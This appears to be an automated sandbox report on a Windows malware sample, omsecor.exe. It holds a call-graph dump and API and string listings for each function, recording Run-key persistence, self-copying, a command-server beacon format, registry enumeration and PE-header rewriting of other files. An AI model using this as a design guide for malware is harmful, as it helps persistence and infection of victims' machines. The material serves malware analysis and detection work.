6665 4039a3 8 API calls 6664->6665 6665->6663 6670 404100 6666->6670 6667 40412c SHGetFolderPathW 6667->6670 6668 408248 8 API calls 6668->6670 6669 40416d 6671 404172 6669->6671 6672 40417c 6669->6672 6670->6667 6670->6668 6670->6669 6673 4033a0 HeapFree 6671->6673 6674 40be3a HeapFree 6672->6674 6675 40417a 6673->6675 6674->6675 6676 4041e4 HeapAlloc 6675->6676 6687 404453 6676->6687 6691 404212 6676->6691 6677 4042a0 RegOpenKeyExW 6677->6691 6678 40443d 6680 40be3a HeapFree 6678->6680 6679 40440f RegEnumKeyExW 6681 404427 RegCloseKey 6679->6681 6679->6691 6682 404445 6680->6682 6681->6691 6683 404455 6682->6683 6684 40444b 6682->6684 6686 40be3a HeapFree 6683->6686 6685 4033a0 HeapFree 6684->6685 6685->6687 6686->6687 6694 40451b 6687->6694 6688 40848f 7 API calls 6688->6691 6689 40435e RegOpenKeyExW 6689->6691 6690 40845d 2 API calls 6690->6691 6691->6677 6691->6678 6691->6679 6691->6688 6691->6689 6691->6690 6692 40c3f9 wvnsprintfW 6691->6692 6693 40c00b 3 API calls 6691->6693 6692->6691 6693->6691 6795 40be9d 6694->6795 6696 404535 HeapAlloc 6697 404786 6696->6697 6708 404555 6696->6708 6698 404796 6697->6698 6699 40478c 6697->6699 6701 40be3a HeapFree 6698->6701 6700 4033a0 HeapFree 6699->6700 6702 404794 6700->6702 6701->6702 6714 404a92 6702->6714 6703 4045c5 RegOpenKeyExW 6704 4045e8 RegEnumKeyExW 6703->6704 6703->6708 6704->6708 6705 404780 6707 40be3a HeapFree 6705->6707 6706 40476a RegCloseKey 6706->6708 6707->6697 6708->6703 6708->6705 6708->6706 6709 40473d RegEnumKeyExW 6708->6709 6710 40848f 7 API calls 6708->6710 6712 40c3f9 wvnsprintfW 6708->6712 6713 40c00b 3 API calls 6708->6713 6796 40854c RegOpenKeyExW 6708->6796 6709->6708 6710->6708 6712->6708 6713->6708 6716 404aab 6714->6716 6715 404ad7 SHGetFolderPathW 6715->6716 6716->6715 6717 404b18 6716->6717 6718 408248 8 API calls 6716->6718 6719 404b27 6717->6719 6720 404b1d 6717->6720 6718->6716 6722 40be3a HeapFree 6719->6722 6721 4033a0 HeapFree 6720->6721 6723 404b25 6721->6723 6722->6723 6724 405136 6723->6724 6726 405150 6724->6726 6725 40848f 7 API calls 6725->6726 6726->6725 6727 40520b 6726->6727 6728 4051e0 ExpandEnvironmentStringsW 6726->6728 6729 405211 6727->6729 6730 40521b 6727->6730 6731 404e7b 8 API calls 6728->6731 6732 4033a0 HeapFree 6729->6732 6733 40be3a HeapFree 6730->6733 6731->6726 6734 405219 6732->6734 6733->6734 6735 405229 6734->6735 6736 405238 6735->6736 6737 407b4e 9 API calls 6736->6737 6738 4052e8 6737->6738 6739 406d14 2 API calls 6738->6739 6742 405361 Sleep 6738->6742 6745 405372 6738->6745 6739->6738 6740 40537c Sleep 6740->6745 6742->6738 6743 4053cb Sleep 6743->6745 6744 4053e0 6745->6740 6745->6743 6745->6744 6800 409df4 6745->6800 6747 4084af 6746->6747 6750 4084c5 6746->6750 6764 40845d RegQueryValueExW 6747->6764 6749 403796 6749->6633 6749->6641 6750->6749 6767 40bfd0 6750->6767 6752 408518 6753 40852e 6752->6753 6754 40851f ExpandEnvironmentStringsW 6752->6754 6755 408531 GetProcessHeap HeapFree 6753->6755 6754->6753 6754->6755 6755->6749 6757 4034bc 6756->6757 6758 408248 8 API calls 6757->6758 6759 40350a 6758->6759 6759->6641 6761 4033a4 6760->6761 6762 40be3a HeapFree 6761->6762 6763 4033d7 6762->6763 6763->6639 6765 408482 RegCloseKey 6764->6765 6766 40847f 6764->6766 6765->6750 6766->6765 6768 40bfd7 6767->6768 6769 40bfda 6767->6769 6768->6752 6770 40bff3 6769->6770 6773 40be27 HeapAlloc 6769->6773 6770->6752 6772 40bffa 6772->6752 6773->6772 6775 403a1a GetPrivateProfileStringW 6774->6775 6778 403bb9 PathRemoveFileSpecW 6774->6778 6776 403a36 6775->6776 6787 403baf 6775->6787 6779 403a48 HeapAlloc 6776->6779 6776->6787 6777 40be3a HeapFree 6777->6778 6778->6657 6779->6787 6788 403a64 6779->6788 6780 403ac8 StrStrIW 6781 403add StrStrIW 6780->6781 6780->6788 6782 403af2 GetPrivateProfileStringW 6781->6782 6781->6788 6783 403b09 GetPrivateProfileStringW 6782->6783 6782->6788 6784 403b26 GetPrivateProfileStringW 6783->6784 6783->6788 6784->6788 6785 403ba9 6786 40be3a HeapFree 6785->6786 6786->6787 6787->6777 6788->6780 6788->6785 6789 40c3f9 wvnsprintfW 6788->6789 6790 40c00b 3 API calls 6788->6790 6789->6788 6790->6788 6792 4039b7 6791->6792 6793 408248 8 API calls 6792->6793 6794 4039e5 6793->6794 6794->6657 6795->6696 6797 40856f 6796->6797 6799 408585 6796->6799 6798 40845d 2 API calls 6797->6798 6798->6799 6799->6708 6801 409e01 6800->6801 6813 40beea 6801->6813 6804 409eb1 HttpOpenRequestW 6805 409ead 6804->6805 6806 409ecf HttpSendRequestW 6804->6806 6805->6745 6808 40be3a HeapFree 6806->6808 6809 409eea 6808->6809 6809->6805 6810 409eef InternetReadFile 6809->6810 6810->6805 6811 409f0c 6810->6811 6821 40bf35 6811->6821 6814 40bef4 6813->6814 6825 40beb4 6814->6825 6817 409e3e InternetConnectW 6817->6804 6817->6805 6819 40bf1c 6819->6817 6820 40beb4 WideCharToMultiByte 6819->6820 6820->6817 6822 40bf3f MultiByteToWideChar 6821->6822 6823 40bf3a 6821->6823 6824 40bf58 6822->6824 6823->6822 6824->6805 6826 40bec3 WideCharToMultiByte 6825->6826 6827 40bebe 6825->6827 6828 40bedd 6826->6828 6827->6826 6828->6817 6829 40be27 HeapAlloc 6828->6829 6829->6819 7007 40d2ac 7008 40d2ca 7007->7008 7011 40d378 __except_handler3 7007->7011 7009 40d790 __except_handler3 2 API calls 7008->7009 7010 40d2e5 __except_handler3 _CallDestructExceptionObject @_EH4_CallFilterFunc@8 7009->7010 7010->7011 7012 40d110 __except_handler3 RtlUnwind 7010->7012 7012->7010 7013 402cad 7014 406c77 3 API calls 7013->7014 7015 402cc3 7014->7015 7016 406cb5 GetVersionExW 7015->7016 7017 402cc8 7016->7017 7018 40a8f9 34 API calls 7017->7018 7019 402cdb 7018->7019 7020 40267a 122 API calls 7019->7020 7021 402d00 7020->7021 7022 409c6f SysFreeString 7021->7022 7023 402d08 7022->7023 7024 4032af ExitProcess 7029 402c32 7030 40267a 122 API calls 7029->7030 7031 402c56 7030->7031 7032 409c6f SysFreeString 7031->7032 7033 402c5e 7032->7033 6830 402df3 6831 406c77 3 API calls 6830->6831 6832 402e08 6831->6832 6833 406cb5 GetVersionExW 6832->6833 6834 402e0d 6833->6834 6835 40a8f9 34 API calls 6834->6835 6836 402e20 6835->6836 6837 40267a 122 API calls 6836->6837 6838 402e39 6837->6838 7034 4094b6 7035 4094c9 7034->7035 7036 4094cd 7035->7036 7037 4094f3 CharLowerW CharLowerW 7035->7037 7038 4094e3 SysFreeString 7035->7038 7039 409560 7037->7039 7042 409512 7037->7042 7040 40957e 7038->7040 7041 40956f SysFreeString SysFreeString 7039->7041 7041->7040 7042->7039 7042->7041 7043 40953a CharLowerW 7042->7043 7044 409544 7043->7044 7045 40956a SysFreeString 7044->7045 7045->7041 7046 402db7 7047 40267a 122 API calls 7046->7047 7048 402dd1 7047->7048 7049 40183a 7050 401854 7049->7050 7051 408091 3 API calls 7050->7051 7054 401958 7050->7054 7052 40194a 7051->7052 7053 408091 3 API calls 7052->7053 7053->7054 7057 402e3e 7067 402e4d 7057->7067 7058 40327c 7059 402eb7 GetModuleFileNameW 7060 402ed6 GetCurrentDirectoryW 7059->7060 7059->7067 7060->7067 7061 402f2a GetLastError 7062 40a786 35 API calls 7061->7062 7062->7067 7063 403251 GetLastError 7063->7067 7064 403237 GetLastError 7064->7067 7065 40a786 35 API calls 7065->7067 7066 407552 Sleep 7066->7067 7067->7058 7067->7059 7067->7061 7067->7063 7067->7064 7067->7065 7067->7066 7068 40253c 50 API calls 7067->7068 7068->7067 7080 403bbf 7081 40821c PathCombineW 7080->7081 7082 403bdf 7081->7082 7083 403bf9 7082->7083 7084 403bfe 7082->7084 7085 403bee 7082->7085 7087 4039ea 12 API calls 7084->7087 7086 4039a3 8 API calls 7085->7086 7086->7083 7087->7083

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNEL32(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 199 40a859-40a87e call 405529 call 4078cb call 40a718 196->199 197->199 206 40a880-40a892 call 40a744 199->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 233 407eba 231->233 234 407e7e-407e82 231->234 237 407ebc-407ebe 233->237 234->233 236 407e84 234->236 235->231 235->233 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->237
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 249 40ac78-40ac7a 246->249 250 40ac7c-40ac87 call 4069c0 246->250 252 40ac5a-40ac5e 247->252 253 40ac8e-40ac92 249->253 254 40ac8c-40ac8d 250->254 252->246 252->253 254->253
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 297 4077d2-4077dc 294->297 298 4077bc-4077c8 GetLastError 294->298 296 4077ca call 40a786 295->296 301 4077cf 296->301 297->286 300 4077de 297->300 298->296 300->293 301->297
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
